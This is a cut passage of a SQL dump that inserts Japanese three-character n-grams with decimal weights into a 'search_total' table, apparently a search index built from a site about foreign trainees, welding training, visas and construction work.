('営して', 0.30103),
('営を開', 0.30103),
('営んで', 0.30103),
('回クラ', 0.30103),
('回レス', 0.0222764),
('困難に', 0.30103),
('図作成', 0.30103),
('国から', 0.30103),
('国が規', 0.30103),
('国など', 0.282033),
('国に到', 0.30103),
('国に在', 0.30103),
('国に戻', 0.30103),
('国に渡', 0.30103),
('国に行', 0.124939),
('国の仕', 0.30103),
('国の文', 0.30103),
('国の環', 0.30103),
('国の言', 0.30103),
('国の造', 0.00510275),
('国人に', 0.0147803),
('国人船', 0.30103),
('国側担', 0.01524),
('国内外', 0.30103),
('国籍青', 0.30103),
('国語で', 0.30103),
('国語ク', 0.30103),
('国語コ', 0.01524),
('国語学', 0.30103),
('国際ス', 0.176091),
('土を拠', 0.30103),
('土建屋', 0.30103),
('在の職', 0.30103),
('在住す', 0.30103),
('在日本', 0.30103),
('在的な', 0.234916),
('地域消', 0.30103),
('地方域', 0.0853499),
('型レス', 0.09691),
('域で元', 0.30103),
('域消防', 0.30103),
('基本に', 0.30103),
('基準で', 0.225389),
('基準に', 0.30103),
('基礎か', 0.30103),
('基礎教', 0.30103),
('場での', 0.30103),
('場では', 0.18095),
('場で一', 0.124939),
('場で困', 0.30103),
('場の大', 0.30103),
('場を変', 0.30103),
('場合で', 0.30103),
('場合に', 0.30103),
('場合は', 0.30103),
('場環境', 0.30103),
('場用の', 0.30103),
('場経験', 0.30103),
('境での', 0.30103),
('境を育', 0.30103),
('士号ま', 0.30103),
('売する', 0.30103),
('売と建', 0.30103),
('売を開', 0.30103),
('売買を', 0.30103),
('変える', 0.30103),
('変嬉し', 0.30103),
('外で働', 0.30103),
('外に勤', 0.30103),
('外の仕', 0.30103),
('外の労', 0.30103),
('外エー', 0.107844),
('外労働', 0.30103),
('外国の', 0.185529),
('外国人', 0.0146073),
('外職に', 0.30103),
('外食ビ', 0.30103),
('外食合', 0.30103),
('外食実', 0.30103),
('外食第', 0.30103),
('外食面', 0.09691),
('多くの', 0.249378),
('多く受', 0.30103),
('夜間の', 0.30103),
('大いに', 0.30103),
('大きな', 0.30103),
('大人の', 0.30103),
('大切で', 0.30103),
('大切に', 0.30103),
('大型レ', 0.09691),
('大変嬉', 0.30103),
('大学の', 0.30103),
('大学を', 0.177487),
('大臣に', 0.0579919),
('大規模', 0.30103),
('大都市', 0.30103),
('大限に', 0.30103),
('失がな', 0.30103),
('奨励し', 0.30103),
('女たち', 0.30103),
('女性で', 0.30103),
('妹たち', 0.30103),
('妹を誇', 0.30103),
('姉妹た', 0.30103),
('姉妹を', 0.30103),
('始いた', 0.30103),
('始しま', 0.09691),
('姿勢を', 0.30103),
('娘が日', 0.09691),
('娘とし', 0.30103),
('娘を育', 0.30103),
('嬉しく', 0.30103),
('子です', 0.30103),
('子ども', 0.30103),
('子会社', 0.30103),
('子供た', 0.30103),
('子工学', 0.30103),
('字を克', 0.30103),
('字日本', 0.30103),
('存続期', 0.30103),
('学の学', 0.179244),
('学の磨', 0.09691),
('学びた', 0.0988318),
('学ぶこ', 0.224064),
('学を卒', 0.177783),
('学位が', 0.30103),
('学位と', 0.30103),
('学位保', 0.30103),
('学士号', 0.176091),
('学学校', 0.30103),
('学校と', 0.30103),
('学校の', 0.30103),
('学校も', 0.30103),
('学校卒', 0.30103),
('学歴の', 0.30103),
('学生が', 0.30103),
('学生た', 0.30103),
('学生だ', 0.30103),
('学生に', 0.154286),
('学生の', 0.227022),
('学生は', 0.217386),
('学生ビ', 0.30103),
('学生達', 0.175923),
('学習の', 0.147886),
('学習を', 0.30103),
('宅など', 0.30103),
('宅を建', 0.30103),
('宅を提', 0.30103),
('宅プロ', 0.229144),
('宅建築', 0.30103),
('守して', 0.0791812),
('安を軽', 0.30103),
('安全な', 0.30103),
('完全に', 0.30103),
('定する', 0.30103),
('定の分', 0.184747),
('定めた', 0.224288),
('定ビザ', 0.30103),
('定外職', 0.30103),
('定外食', 0.0147233),
('定技能', 0.216304),
('定能力', 0.0147803),
('定飲食', 0.0791812),
('実に必', 0.124939),
('実務研', 0.30103),
('実技ク', 0.0222764),
('実施さ', 0.30103),
('実用的', 0.30103),
('実習の', 0.0222764),
('実習を', 0.30103),
('実習ク', 0.0211893),
('実習授', 0.0222764),
('実習生', 0.222756),
('実習看', 0.0222764),
('実践的', 0.103785),
('客様に', 0.30103),
('室を開', 0.124939),
('家に対', 0.184747),
('家庭用', 0.30103),
('容が説', 0.124939),
('富で能', 0.30103),
('富なイ', 0.176091),
('富なエ', 0.124939),
('富な先', 0.30103),
('富な女', 0.30103),
('富な技', 0.103842),
('富な指', 0.30103),
('富な溶', 0.176091),
('富な講', 0.30103),
('寝る習', 0.30103),
('察しま', 0.0579919),
('寧にき', 0.30103),
('寧に指', 0.30103),
('寮の生', 0.30103),
('対して', 0.0676853),
('対する', 0.0125467),
('寿司レ', 0.0222764),
('寿司料', 0.30103),
('専門コ', 0.30103),
('専門作', 0.30103),
('専門学', 0.30103),
('専門家', 0.102124),
('専門知', 0.229484),
('専門職', 0.184747),
('尊厳を', 0.30103),
('尊敬し', 0.30103),
('尊重を', 0.30103),
('導しま', 0.30103),
('導する', 0.30103),
('導によ', 0.19915),
('導の下', 0.30103),
('導の源', 0.30103),
('導を受', 0.30103),
('導者た', 0.30103),
('小グル', 0.30103),
('少し話', 0.30103),
('少なく', 0.176091),
('少人数', 0.30103),
('少年資', 0.30103),
('尚良い', 0.30103),
('就いて', 0.30103),
('就くた', 0.30103),
('就職の', 0.30103),
('就職も', 0.30103),
('就職面', 0.30103),
('尽くす', 0.30103),
('尽力し', 0.287512),
('岡への', 0.30103),
('岸で経', 0.212959),
('崎への', 0.09691),
('工事の', 0.30103),
('工事を', 0.30103),
('工事監', 0.30103),
('工学の', 0.30103),
('工工事', 0.30103),
('工業用', 0.30103),
('工業関', 0.30103),
('工科大', 0.30103),
('差し引', 0.09691),
('己管理', 0.30103),
('巻く日', 0.30103),
('市で日', 0.30103),
('市にあ', 0.30103),
('師から', 0.30103),
('師が指', 0.30103),
('師の指', 0.30103),
('師の方', 0.30103),
('常にサ', 0.30103),
('常に選', 0.30103),
('常の給', 0.30103),
('幅広い', 0.30103),
('年に会', 0.30103),
('年に外', 0.30103),
('年に当', 0.30103),
('年に設', 0.135833),
('年の勤', 0.30103),
('年の竣', 0.30103),
('年の経', 0.176091),
('年の間', 0.30103),
('年以上', 0.131634),
('年資源', 0.30103),
('年間の', 0.30103),
('年間続', 0.30103),
('年齢が', 0.30103),
('幼い娘', 0.09691),
('広いト', 0.30103),
('底的に', 0.30103),
('店で組', 0.30103),
('店の面', 0.0791812),
('府およ', 0.30103),
('府から', 0.30103),
('府機関', 0.30103),
('府部門', 0.30103),
('度計算', 0.30103),
('庭用自', 0.30103),
('康でア', 0.30103),
('康でコ', 0.30103),
('康と仕', 0.30103),
('康に気', 0.09691),
('康をお', 0.30103),
('康を祈', 0.30103),
('康保険', 0.176091),
('建ての', 0.225852),
('建物の', 0.30103),
('建築株', 0.164471),
('建築業', 0.30103),
('建築設', 0.30103),
('建設し', 0.30103),
('建設プ', 0.30103),
('建設会', 0.30103),
('建設前', 0.30103),
('建設工', 0.30103),
('建設業', 0.30103),
('建設機', 0.30103),
('建設現', 0.0978479),
('建設部', 0.30103),
('弊社ウ', 0.00934003),
('式会社', 0.00514411),
('引いた', 0.176091),
('引かれ', 0.176091),
('引き続', 0.30103),
('張する', 0.30103),
('張って', 0.30103),
('強する', 0.30103),
('強でき', 0.30103),
('強度計', 0.30103),
('当たり', 0.30103),
('当は通', 0.30103),
('当ウェ', 0.30103),
('当社の', 0.0426434),
('当社は', 0.0947347),
('当社ニ', 0.30103),
('彙を拡', 0.30103),
('彙を知', 0.30103),
('役割を', 0.30103),
('彼らの', 0.30103),
('彼女た', 0.30103),
('待され', 0.30103),
('待つも', 0.30103),
('律の重', 0.30103),
('後にあ', 0.30103),
('後も果', 0.30103),
('徒にサ', 0.30103),
('徒の勤', 0.30103),
('徒達の', 0.30103),
('徒達を', 0.176091),
('従事し', 0.30103),
('従事す', 0.184747),
('従業員', 0.134677),
('得おめ', 0.0280287),
('得して', 0.30103),
('得する', 0.30103),
('得られ', 0.124939),
('得税な', 0.176091),
('徳心を', 0.30103),
('徹底的', 0.30103),
('心から', 0.30103),
('心な講', 0.30103),
('心を持', 0.30103),
('心者で', 0.09691),
('心配す', 0.30103),
('必要が', 0.0772028),
('必要で', 0.0629914),
('必要と', 0.11084),
('必要な', 0.0862866),
('必要は', 0.134649),
('必要も', 0.30103),
('応じて', 0.30103),
('応募を', 0.30103),
('応募者', 0.30103),
('念建築', 0.30103),
('思いま', 0.30103),
('思うよ', 0.30103),
('思って', 0.30103),
('思議で', 0.30103),
('急で募', 0.124939),
('急で求', 0.124939),
('急に求', 0.124939),
('性があ', 0.176091),
('性であ', 0.30103),
('性のあ', 0.30103),
('性のみ', 0.183954),
('性の世', 0.30103),
('性を信', 0.30103),
('性を理', 0.176091),
('恵外食', 0.30103),
('意と規', 0.30103),
('意欲が', 0.30103),
('感じら', 0.30103),
('感謝し', 0.30103),
('感謝申', 0.30103),
('慈善事', 0.30103),
('慎重に', 0.30103),
('慣をつ', 0.30103);
INSERT INTO `search_total` (`word`, `count`) VALUES
('懸命に', 0.30103),
('懸命働', 0.159861),
('懸命勉', 0.30103),
('成に向', 0.30103),
('成の旅', 0.30103),
('成サー', 0.30103),
('成功し', 0.1517),
('成功と', 0.30103),
('成功の', 0.30103),
('成果を', 0.30103),
('成績で', 0.30103),
('成長の', 0.30103),
('戻るケ', 0.30103),
('房にお', 0.30103),
('房業務', 0.30103),
('所から', 0.0579919),
('所で働', 0.30103),
('所で溶', 0.0157943),
('所で雇', 0.01524),
('所で電', 0.01524),
('所得税', 0.176091),
('扉を開', 0.30103),
('手に入', 0.30103),
('手に話', 0.30103),
('手を取', 0.30103),
('手伝い', 0.0791812),
('手当は', 0.30103),
('手掛け', 0.30103),
('手段と', 0.30103),
('手配を', 0.30103),
('手頃な', 0.30103),
('手順を', 0.30103),
('払う必', 0.30103),
('扱った', 0.30103),
('技クラ', 0.30103),
('技能な', 0.30103),
('技能ビ', 0.30103),
('技術を', 0.233083),
('技術分', 0.184747),
('技術的', 0.30103),
('技術者', 0.00680917),
('投資す', 0.30103),
('抱きし', 0.30103),
('担当者', 0.01524),
('拠点に', 0.30103),
('拡張す', 0.30103),
('括的な', 0.18422),
('持たれ', 0.30103),
('持って', 0.00749829),
('持つ労', 0.191642),
('持つ方', 0.0994485),
('持つ講', 0.30103),
('持者が', 0.30103),
('持者の', 0.30103),
('指して', 0.202467),
('指導し', 0.30103),
('指導す', 0.30103),
('指導に', 0.198771),
('指導の', 0.176091),
('指導を', 0.30103),
('指導者', 0.30103),
('振る舞', 0.30103),
('授与さ', 0.30103),
('授業で', 0.30103),
('授業の', 0.195659),
('授業を', 0.30103),
('排除し', 0.30103),
('掛けさ', 0.30103),
('接に優', 0.09691),
('接に合', 0.0153576),
('接の分', 0.30103),
('接の準', 0.30103),
('接クラ', 0.00998422),
('接仕入', 0.30103),
('接合格', 0.0143741),
('接技術', 0.00734502),
('接研修', 0.0579919),
('接試験', 0.124939),
('接輸入', 0.30103),
('掴むサ', 0.30103),
('掴んで', 0.09691),
('提供さ', 0.30103),
('提供し', 0.0710265),
('提供す', 0.0972814),
('提供を', 0.30103),
('提携し', 0.30103),
('換えて', 0.30103),
('援を提', 0.274895),
('援を続', 0.30103),
('揺るぎ', 0.30103),
('損失が', 0.30103),
('携も行', 0.30103),
('支店で', 0.30103),
('支払う', 0.30103),
('支援を', 0.210323),
('支給し', 0.30103),
('政府お', 0.30103),
('政府か', 0.30103),
('政府機', 0.30103),
('政府部', 0.30103),
('政的な', 0.30103),
('教えて', 0.30103),
('教える', 0.30103),
('教室を', 0.124939),
('教師の', 0.30103),
('教科書', 0.267661),
('教育と', 0.30103),
('教育を', 0.30103),
('教育中', 0.30103),
('敬しま', 0.30103),
('敬意と', 0.30103),
('数制の', 0.30103),
('文化な', 0.30103),
('文化や', 0.30103),
('文化を', 0.0791812),
('文法を', 0.30103),
('料理の', 0.30103),
('料金を', 0.268452),
('新しい', 0.30103),
('新たな', 0.30103),
('新化さ', 0.30103),
('新潟大', 0.30103),
('新総合', 0.204729),
('新鮮な', 0.30103),
('方でも', 0.09691),
('方で多', 0.30103),
('方に対', 0.102489),
('方のた', 0.0911968),
('方の指', 0.30103),
('方域で', 0.30103),
('方法を', 0.30103),
('施され', 0.30103),
('施設で', 0.30103),
('旅に出', 0.30103),
('旅をサ', 0.18211),
('旅を祈', 0.30103),
('旅を通', 0.30103),
('族を問', 0.30103),
('族問わ', 0.30103),
('日あた', 0.30103),
('日から', 0.0147233),
('日につ', 0.124939),
('日にト', 0.30103),
('日に日', 0.176091),
('日に設', 0.30103),
('日に食', 0.09691),
('日本か', 0.268308),
('日本で', 0.0579919),
('日本に', 0.0220686),
('日本の', 0.0231511),
('日本へ', 0.30103),
('日本よ', 0.30103),
('日本人', 0.30103),
('日本到', 0.0222764),
('日本語', 0.0340995),
('日無事', 0.30103),
('旧問題', 0.30103),
('早く検', 0.30103),
('早めに', 0.101133),
('旬の食', 0.30103),
('明され', 0.124939),
('明しま', 0.124939),
('明する', 0.30103),
('明書が', 0.30103),
('明確で', 0.30103),
('星ホテ', 0.01524),
('時から', 0.30103),
('時には', 0.30103),
('時まで', 0.30103),
('時以降', 0.30103),
('時間の', 0.176091),
('時間を', 0.0723595),
('晴らし', 0.30103),
('暇があ', 0.176091),
('暢に話', 0.188306),
('書が授', 0.30103),
('書料金', 0.268189),
('最優先', 0.30103),
('最初に', 0.30103),
('最初の', 0.30103),
('最善を', 0.30103),
('最大規', 0.30103),
('最大限', 0.30103),
('最後に', 0.128328),
('最新化', 0.30103),
('月から', 0.30103),
('月以内', 0.30103),
('月曜日', 0.264536),
('有名レ', 0.30103),
('服する', 0.30103),
('服装を', 0.30103),
('朝の仕', 0.30103),
('期待さ', 0.30103),
('期生イ', 0.0222764),
('期生向', 0.0222764),
('期間を', 0.30103),
('期間内', 0.30103),
('本から', 0.268908),
('本での', 0.124939),
('本でも', 0.30103),
('本でよ', 0.30103),
('本で特', 0.30103),
('本に仕', 0.0263289),
('本に到', 0.30103),
('本に実', 0.30103),
('本に行', 0.30103),
('本に送', 0.30103),
('本のレ', 0.30103),
('本の仕', 0.30103),
('本の北', 0.30103),
('本の大', 0.30103),
('本の就', 0.30103),
('本の技', 0.30103),
('本の文', 0.0791812),
('本の新', 0.30103),
('本の東', 0.30103),
('本の福', 0.09691),
('本の秋', 0.30103),
('本の習', 0.30103),
('本への', 0.30103),
('本より', 0.30103),
('本人の', 0.30103),
('本到着', 0.0222764),
('本日無', 0.30103),
('本気で', 0.30103),
('本語の', 0.175915),
('本語を', 0.254601),
('本語ク', 0.30103),
('本語コ', 0.124939),
('本語チ', 0.30103),
('本語学', 0.30103),
('本語教', 0.30103),
('本語能', 0.146389),
('材によ', 0.30103),
('材の重', 0.30103),
('材紹介', 0.30103),
('来た民', 0.30103),
('来て溶', 0.124939),
('来られ', 0.176091),
('来ると', 0.0263289),
('来サー', 0.30103),
('東京で', 0.30103),
('東京の', 0.09691),
('東京へ', 0.30103),
('東京市', 0.30103),
('果が得', 0.124939),
('果たし', 0.30103),
('果を証', 0.30103),
('果的な', 0.30103),
('校との', 0.30103),
('校の設', 0.30103),
('校も開', 0.30103),
('校を視', 0.0579919),
('校卒業', 0.30103),
('株式会', 0.00423998),
('格おめ', 0.0202034),
('格した', 0.0341287),
('格しま', 0.0222764),
('格する', 0.177189),
('格でき', 0.30103),
('格のあ', 0.30103),
('格の住', 0.30103),
('格を祝', 0.0222764),
('格者が', 0.30103),
('格者は', 0.30103),
('格者達', 0.30103),
('梁の建', 0.30103),
('械の輸', 0.30103),
('械を日', 0.30103),
('械工学', 0.30103),
('検索し', 0.30103),
('業が必', 0.30103),
('業した', 0.30103),
('業して', 0.30103),
('業です', 0.30103),
('業とし', 0.30103),
('業に従', 0.184747),
('業の一', 0.255823),
('業の様', 0.30103),
('業や韓', 0.30103),
('業を受', 0.30103),
('業を可', 0.30103),
('業を営', 0.30103),
('業を開', 0.30103),
('業内容', 0.0157943),
('業務ま', 0.30103),
('業務を', 0.30103),
('業員が', 0.30103),
('業員に', 0.30103),
('業員を', 0.30103),
('業員向', 0.30103),
('業建築', 0.30103),
('業手当', 0.30103),
('業生な', 0.30103),
('業用住', 0.30103),
('業界で', 0.30103),
('業関係', 0.151821),
('極的に', 0.30103),
('楽しみ', 0.30103),
('様に十', 0.30103),
('様の目', 0.30103),
('様子で', 0.30103),
('標達成', 0.30103),
('模のゼ', 0.30103),
('模範的', 0.30103),
('橋梁の', 0.30103),
('機会が', 0.30103),
('機会で', 0.30103),
('機会と', 0.30103),
('機会に', 0.30103),
('機会を', 0.122372),
('機材に', 0.30103),
('機械の', 0.30103),
('機械を', 0.30103),
('機械工', 0.30103),
('機関お', 0.30103),
('機関と', 0.30103),
('欲が必', 0.30103),
('正しさ', 0.30103),
('正直さ', 0.30103),
('正確な', 0.30103),
('歳から', 0.30103),
('歳の健', 0.30103),
('歳以下', 0.30103),
('歴の要', 0.30103),
('残る可', 0.176091),
('残業が', 0.30103),
('残業と', 0.176091),
('残業手', 0.30103),
('段とし', 0.30103),
('母国に', 0.30103),
('比類な', 0.30103),
('民族を', 0.30103),
('民族問', 0.30103),
('民間お', 0.30103),
('民間の', 0.30103),
('民間住', 0.30103),
('民間部', 0.30103),
('気で取', 0.30103),
('気を付', 0.09691),
('気エン', 0.0147233),
('気軽に', 0.30103),
('水曜日', 0.265079),
('永続的', 0.30103),
('求めて', 0.0669468),
('沿って', 0.30103),
('法から', 0.30103),
('法を教', 0.30103),
('法を磨', 0.30103),
('注力し', 0.30103),
('注意な', 0.30103),
('活動に', 0.30103),
('活動や', 0.176091),
('活用し', 0.30103),
('活費は', 0.30103),
('活躍が', 0.30103),
('活躍す', 0.30103),
('流暢に', 0.188306),
('海外で', 0.30103),
('海外に', 0.30103),
('海外の', 0.30103),
('海外エ', 0.107844),
('海外労', 0.30103),
('海道へ', 0.176091),
('消防署', 0.30103),
('深めま', 0.30103),
('減して', 0.30103),
('減する', 0.30103),
('減らし', 0.30103),
('減ソリ', 0.30103),
('渡った', 0.30103),
('湾岸で', 0.212811),
('満足い', 0.30103),
('源でし', 0.30103),
('源開発', 0.30103),
('準で管', 0.225497),
('準に沿', 0.30103),
('準備が', 0.19693),
('準備を', 0.30103),
('準専門', 0.184747),
('溶接の', 0.30103),
('溶接ク', 0.00998422),
('溶接技', 0.00734457),
('溶接研', 0.0579919),
('溶接試', 0.124939),
('滞なく', 0.30103),
('漁業関', 0.30103),
('漢字を', 0.30103),
('漢字日', 0.30103),
('潜在的', 0.234389),
('潟大学', 0.30103),
('火曜日', 0.264808),
('点に自', 0.30103),
('無事終', 0.30103),
('熟練労', 0.01524),
('熱心な', 0.30103),
('物の修', 0.30103),
('特別な', 0.0994485),
('特定の', 0.184747),
('特定ビ', 0.30103),
('特定外', 0.0142404),
('特定技', 0.215749),
('特定能', 0.0147803),
('特定飲', 0.0791812),
('特恵外', 0.30103),
('特選外', 0.0791812),
('状を見', 0.30103),
('独占的', 0.0147233),
('献身を', 0.30103),
('献身的', 0.30103),
('現を教', 0.30103),
('現在の', 0.30103),
('現在日', 0.30103),
('現場で', 0.124939),
('現場用', 0.30103),
('現状を', 0.30103),
('理して', 0.22582),
('理で行', 0.30103),
('理の背', 0.30103),
('理念建', 0.30103),
('理経験', 0.188306),
('理職や', 0.184747),
('理解し', 0.09691),
('理解す', 0.0959573),
('理解で', 0.250965),
('理責任', 0.30103),
('理関係', 0.30103),
('環境で', 0.30103),
('環境を', 0.30103),
('生がそ', 0.30103),
('生たち', 0.0511525),
('生だけ', 0.30103),
('生と手', 0.30103),
('生など', 0.30103),
('生にも', 0.30103),
('生に伝', 0.30103),
('生に対', 0.110423),
('生のト', 0.30103),
('生の成', 0.30103),
('生は日', 0.30103),
('生は高', 0.30103),
('生み出', 0.176091),
('生を育', 0.30103),
('生イン', 0.0222764),
('生ビザ', 0.238837),
('生向け', 0.0222764),
('生徒が', 0.30103),
('生徒に', 0.30103),
('生徒の', 0.30103),
('生徒達', 0.124939),
('生懸命', 0.0561356),
('生活費', 0.098512),
('生達と', 0.0137883),
('生達に', 0.229383),
('生達の', 0.214845),
('産業建', 0.30103),
('用され', 0.124939),
('用する', 0.30103),
('用のト', 0.30103),
('用を完', 0.30103),
('用トラ', 0.30103),
('用住宅', 0.30103),
('用各種', 0.30103),
('用的な', 0.30103),
('用自動', 0.30103),
('田への', 0.30103),
('田県で', 0.176091),
('申し上', 0.30103),
('男性の', 0.183954),
('界で少', 0.30103),
('界を開', 0.30103),
('番号は', 0.30103),
('発おめ', 0.0791812),
('発した', 0.30103),
('発しま', 0.176091),
('発する', 0.30103),
('発大学', 0.30103),
('登録し', 0.109454),
('登録に', 0.124939),
('登録番', 0.184298),
('的でシ', 0.30103),
('的なス', 0.189358),
('的なト', 0.30103),
('的な会', 0.30103),
('的な問', 0.200365),
('的な姿', 0.30103),
('的な娘', 0.30103),
('的な学', 0.30103),
('的な日', 0.30103),
('的な経', 0.187312),
('的な課', 0.30103),
('的な関', 0.30103),
('的な面', 0.30103),
('的に応', 0.30103),
('的に提', 0.30103),
('的に日', 0.30103),
('的に最', 0.30103),
('的に知', 0.30103),
('皆さん', 0.30103),
('皆様の', 0.30103),
('監督者', 0.30103),
('目の当', 0.30103),
('目を迎', 0.30103),
('目指し', 0.20228),
('目標達', 0.30103),
('直接仕', 0.30103),
('直接輸', 0.30103),
('直輸入', 0.30103),
('相互尊', 0.30103),
('省の副', 0.0579919),
('看護ク', 0.0222764),
('県で働', 0.176091),
('眠をと', 0.30103),
('着しま', 0.30103),
('睡眠を', 0.30103),
('知って', 0.30103),
('知らせ', 0.30103),
('知識と', 0.13092),
('知識を', 0.30103),
('研修に', 0.176091),
('研修を', 0.30103),
('研修ビ', 0.30103),
('研修生', 0.0103581),
('確で正', 0.30103),
('確な考', 0.30103),
('確信し', 0.30103),
('磨きを', 0.09691),
('磨く素', 0.30103),
('礎から', 0.30103),
('礎教育', 0.30103),
('示しま', 0.30103),
('礼儀正', 0.30103),
('社です', 0.30103),
('社と労', 0.30103),
('社と提', 0.30103),
('社にな', 0.30103),
('社のウ', 0.0579919),
('社のシ', 0.00755314),
('社の存', 0.30103),
('社の目', 0.0157943),
('社の細', 0.30103),
('社の自', 0.30103),
('社はコ', 0.30103),
('社はニ', 0.30103),
('社は交', 0.30103),
('社は信', 0.30103),
('社は理', 0.30103),
('社は自', 0.30103),
('社も政', 0.30103),
('社を運', 0.30103),
('社ウェ', 0.00934003),
('社ニュ', 0.30103),
('社情報', 0.0157943),
('社株式', 0.00755314),
('社沿革', 0.0157943),
('社登録', 0.184298),
('祈って', 0.30103),
('祈りし', 0.176091),
('祈りま', 0.30103),
('祖を大', 0.30103),
('祝う上', 0.0222764),
('福岡へ', 0.30103),
('秀な成', 0.09691),
('私たち', 0.0434212),
('私にと', 0.30103),
('私の可', 0.30103),
('私の賞', 0.30103),
('私を信', 0.30103),
('秋田へ', 0.30103),
('秋田県', 0.176091),
('科大学', 0.30103),
('科書料', 0.267925),
('移行し', 0.193434),
('税など', 0.176091),
('税もき', 0.30103),
('種サル', 0.30103),
('種バス', 0.30103),
('種商用', 0.30103),
('種機械', 0.30103),
('積むこ', 0.211225),
('積むた', 0.0222764),
('積めな', 0.30103),
('積極的', 0.30103),
('立され', 0.107502),
('立つた', 0.30103),
('竣工工', 0.30103),
('筆記練', 0.30103),
('等学校', 0.30103),
('算など', 0.30103),
('管理し', 0.225713),
('管理で', 0.30103),
('管理経', 0.188306),
('管理職', 0.184747),
('管理責', 0.30103),
('節目を', 0.30103),
('範的な', 0.30103),
('築くこ', 0.30103),
('築株式', 0.164618),
('築業関', 0.30103),
('築設計', 0.30103),
('籍青少', 0.30103),
('系的に', 0.30103),
('納税も', 0.30103),
('素晴ら', 0.30103),
('細を確', 0.142874),
('細部へ', 0.30103),
('紹介に', 0.30103),
('紹介を', 0.164889),
('終了し', 0.30103),
('組める', 0.30103),
('組んで', 0.30103),
('組織さ', 0.30103),
('経費を', 0.176091),
('経験が', 0.084026),
('経験も', 0.30103),
('経験を', 0.0161374),
('経験豊', 0.026771),
('結果が', 0.124939),
('給しま', 0.30103),
('給与の', 0.30103),
('統につ', 0.30103),
('統に対', 0.30103),
('統に関', 0.30103),
('継続的', 0.257367),
('続き溶', 0.30103),
('続けて', 0.249219),
('続ける', 0.176091),
('続期間', 0.30103),
('続的な', 0.30103),
('続的に', 0.25795),
('緊急で', 0.0669468),
('緊急に', 0.124939),
('総まと', 0.30103),
('総合マ', 0.204854),
('総局と', 0.30103),
('練を受', 0.30103),
('練労働', 0.01524),
('練校を', 0.0579919),
('練習す', 0.30103),
('練習を', 0.176091),
('績で合', 0.30103),
('織され', 0.30103),
('繕工事', 0.30103),
('置き換', 0.30103),
('置につ', 0.188306),
('義で輸', 0.30103),
('習する', 0.30103),
('習のた', 0.30103),
('習のサ', 0.30103),
('習の旅', 0.30103),
('習の目', 0.0222764),
('習を促', 0.30103),
('習を受', 0.30103),
('習を通', 0.30103),
('習を重', 0.30103),
('習クラ', 0.0211893),
('習慣を', 0.30103),
('習授業', 0.0222764),
('習生ビ', 0.30103),
('習看護', 0.0222764),
('考えに', 0.30103),
('考えを', 0.30103),
('者から', 0.30103),
('者が遭', 0.30103),
('者たち', 0.28521),
('者でも', 0.09691),
('者とし', 0.0142404),
('者とと', 0.30103),
('者と永', 0.30103),
('者に対', 0.30103),
('者のた', 0.30103),
('者の労', 0.30103),
('者の間', 0.30103),
('者はニ', 0.30103),
('者をシ', 0.01524),
('者を募', 0.30103),
('者介護', 0.30103),
('者向け', 0.188225),
('者達に', 0.30103),
('聞いて', 0.30103),
('聴解力', 0.30103),
('職に就', 0.30103),
('職の応', 0.30103),
('職の面', 0.30103),
('職もサ', 0.30103),
('職や専', 0.184747),
('職を見', 0.30103),
('職を辞', 0.30103),
('職員住', 0.30103),
('職場で', 0.114035),
('職場の', 0.30103),
('職場を', 0.30103),
('職場環', 0.30103),
('職場経', 0.30103),
('職業や', 0.30103),
('職研修', 0.30103),
('職面接', 0.30103),
('肉の命', 0.30103),
('育てま', 0.30103),
('育と学', 0.30103),
('育みま', 0.30103),
('育を提', 0.30103),
('育んで', 0.30103),
('育成し', 0.30103),
('背後に', 0.30103),
('能など', 0.30103),
('能ビザ', 0.30103),
('能力で', 0.30103),
('能力に', 0.30103),
('能力の', 0.110996),
('能力を', 0.0147803),
('能力試', 0.195516),
('能性が', 0.176091),
('能性の', 0.263487),
('能性を', 0.30103),
('臣によ', 0.0579919),
('自信を', 0.30103),
('自分に', 0.30103),
('自分の', 0.0845882),
('自分ら', 0.30103),
('自動車', 0.0987955),
('自己管', 0.30103),
('興味を', 0.30103),
('舞いを', 0.30103),
('般労働', 0.124939),
('船員の', 0.30103),
('船所か', 0.0579919),
('船所で', 0.00510303),
('良いで', 0.200625),
('良いネ', 0.30103),
('良い息', 0.30103),
('良い機', 0.30103),
('良い知', 0.188306),
('良い車', 0.30103),
('若者た', 0.30103),
('英語な', 0.30103),
('英語を', 0.107484),
('英語学', 0.30103),
('菜や肉', 0.30103),
('葉を抱', 0.30103),
('行う個', 0.30103),
('行きた', 0.30103),
('行くた', 0.124939),
('行しま', 0.193729),
('行って', 0.0963991),
('行ロー', 0.30103),
('術を学', 0.233664),
('術分野', 0.184747),
('術的な', 0.30103),
('術者と', 0.0157943),
('術者の', 0.0148747),
('術者向', 0.187906),
('衣類関', 0.30103),
('表して', 0.30103),
('表現を', 0.30103),
('装をし', 0.30103),
('装置に', 0.188306),
('補者か', 0.30103),
('補者と', 0.30103),
('補者は', 0.30103),
('製造職', 0.30103),
('複雑な', 0.25213),
('要があ', 0.0772547),
('要です', 0.0524384),
('要とさ', 0.110863),
('要な内', 0.124939),
('要な場', 0.216378),
('要はあ', 0.134919),
('要もな', 0.30103),
('要件は', 0.30103),
('要件を', 0.30103),
('要性を', 0.176091),
('見せか', 0.30103),
('見せな', 0.30103),
('見つけ', 0.204129),
('見抜き', 0.30103),
('見込み', 0.124939),
('見逃し', 0.30103),
('規定す', 0.30103),
('規律の', 0.30103),
('規模の', 0.30103),
('視察し', 0.0579919),
('覚えて', 0.0263289),
('覧くだ', 0.30103),
('親を常', 0.30103),
('親を誇', 0.30103),
('解して', 0.09691),
('解する', 0.0959823),
('解でき', 0.251488),
('解力を', 0.198931),
('言うこ', 0.30103),
('言葉を', 0.30103),
('言語が', 0.30103),
('言語だ', 0.30103),
('言語の', 0.30103),
('言語は', 0.30103),
('言語セ', 0.250834),
('言語不', 0.30103),
('言語学', 0.200598),
('言語要', 0.30103),
('計図作', 0.30103),
('計算な', 0.30103),
('訓練を', 0.30103),
('訓練校', 0.0579919),
('記のサ', 0.30103),
('記の活', 0.30103),
('記練習', 0.30103),
('記録保', 0.188306),
('訪問い', 0.30103),
('設して', 0.30103),
('設しま', 0.30103),
('設で実', 0.30103),
('設プロ', 0.30103),
('設会社', 0.30103),
('設前サ', 0.30103),
('設工事', 0.30103),
('設業を', 0.30103),
('設機械', 0.30103),
('設現場', 0.0979327),
('設立さ', 0.107502),
('設立し', 0.30103),
('設計図', 0.269822),
('設部長', 0.30103),
('許可を', 0.20492),
('許可証', 0.30103),
('証しま', 0.30103),
('証の売', 0.30103),
('証明す', 0.30103),
('証明書', 0.30103),
('評価さ', 0.30103),
('評価結', 0.124939),
('試験を', 0.100108),
('話さな', 0.30103),
('話すこ', 0.188306),
('話クラ', 0.30103),
('話力を', 0.30103),
('話方法', 0.30103),
('詳しく', 0.30103),
